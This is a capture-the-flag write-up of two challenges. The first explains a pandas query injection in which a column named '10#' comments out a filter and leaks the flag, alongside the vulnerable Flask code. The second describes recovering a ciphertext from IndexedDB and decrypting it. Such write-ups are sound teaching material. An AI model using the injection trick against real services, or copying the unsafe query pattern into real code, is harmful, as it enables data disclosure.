Challenges:
2. Butterfly
Rnd For Data Science
Vulnerability: Injection in Pandas library query allows to bypass filtering restriction
This challenge included two files whose general purpose was to retrieve column names and a delimiter from the user and to create a CSV file from them.
The server uses the column names as headers for the table and fills the table with random numbers.
After that, it adds another row (the 11th row) that inserts the flag into the second column place.
def index():
delimiter = request.form['delimiter']
if len(delimiter) > 1:
return 'ERROR'
num_columns = int(request.form['numColumns'])
if num_columns > 10:
return 'ERROR'
headers = ['id'] + [request.form["columnName" + str(i)] for i in range(num_columns)]
forb_list = ['and', 'or', 'not']
for header in headers:
if len(header) > 120:
return 'ERROR'
for c in '\'"!@':
if c in header:
return 'ERROR'
for forb_word in forb_list:
if forb_word in header:
return 'ERROR'
csv_file = delimiter.join(headers)
for i in range(10):
row = [str(i)] + [str(rnd.randint(0, 100)) for _ in range(num_columns)]
csv_file += '\n' + delimiter.join(row)
row = [str('NaN')] + ['FLAG'] + [flag] + [str(0) for _ in range(num_columns)]
csv_file += '\n' + delimiter.join(row[:len(headers)])
return csv_file
Then it sends this table to the main app to create a CSV file.
@app.route("/generate", methods=['POST'])
def generate():
data = request.form
delimiter_const = 'delimiter'
r = requests.post('http://127.0.0.1:5001', data=data)
if r.text == 'ERROR':
return 'ERROR'
csv = StringIO(r.text)
df = pd.read_csv(csv)
# Filter out secrets
first = list(df.columns.values)[1]
df = df.query(f'{first} != "FLAG"')
string_df = StringIO(df.to_csv(index=False, sep=data[delimiter_const]))
bytes_df = BytesIO()
bytes_df.write(string_df.getvalue().encode())
bytes_df.seek(0)
We can see that the server takes the second column name: first = list(df.columns.values)[1]
And here it performs a query to retrieve all rows where the value in the second column does not equal 'FLAG':
df = df.query(f'{first} != "FLAG"')
Let's debug it and run it locally.
After entering two columns named "col1" and "col2", we receive this table. As we can see, the flag was not included in this table.
By debugging the code, we can see that before the filter, the table includes the flag (SecretFlag), and after the filter it is not included.
So we need to find a way to alter the the table structure or alter the query, using one of our inputs.
Just like SQL Injection, we can inject to the pandas query a comment and it will ignore everything that comes after it.
By entering a number in the query it returns the corresponding row.
So assuming our first column is named "10#", the query will look like this:
df = df.query(f'10# != "FLAG"')
and be interpreted as df.query('10') which contains the flag.
After filtering the query returned a table that lists the columns and values of row number 10.
And the CSV file will contain the flag:
Butterfly
We have access to a web app:
I did not see any functionalities or interesting requests, so I checked the source code and the browser's storage.
The LocalStorage and SessionStorage contained a key and this string: {"code":"CryptoJS.AES.decrypt(CIPHERTEXT, KEY).toString(CryptoJS.enc.Utf8)"}
I assumed that the key should be in the KEY position, but where is the ciphertext?
Looking in the source code I saw a big obfuscated JavaScript code. I used online deobfuscator and beautifier and this was part of the deobfuscated code:
I tried to understand what may be the ciphertext. Maybe part of the 'enc' array or the full string after joining them together.
However, after checking online what the ciphertext should look like, it was less likely that this was the ciphertext because of its length, structure and different characters.
Knowing that the ciphertext had been altered, I continued to explore other interesting parts in the obfuscated code.
Some of them were "transaction" "readwrite" "target.result". I googled them together to understand what are they related to and understood they are related to IndexedDB.
IndexedDB is a NoSQL database provided by modern browsers. It saved the data on the client-side, in the user's local system. In order to retrieve the data from it, the user need to use JavaScript.
I asked one of the LLMs how to retrieve data from IndexedDB, it gave me a script that needed a small modification and updating the database name and the store object that were "strangeStorage" and "FLAG".
I retrieved the ciphertext from the DB, and decrypted it.
Thanks for reading,
Orel 🌑
II knew you would solve something! That was one really tough CTF. I enjoyed reading your solutions. Not sure I could have coded to the level needed for solving the first one.
Your second challenge is really interesting and I have learnt something new about the existence of IndexedDB and how it is used by modern browsers. Also your tenacity to identify the ciphertext is admirable! I will look for challenges where I can practice this particular challenge.7
Thank you!🤓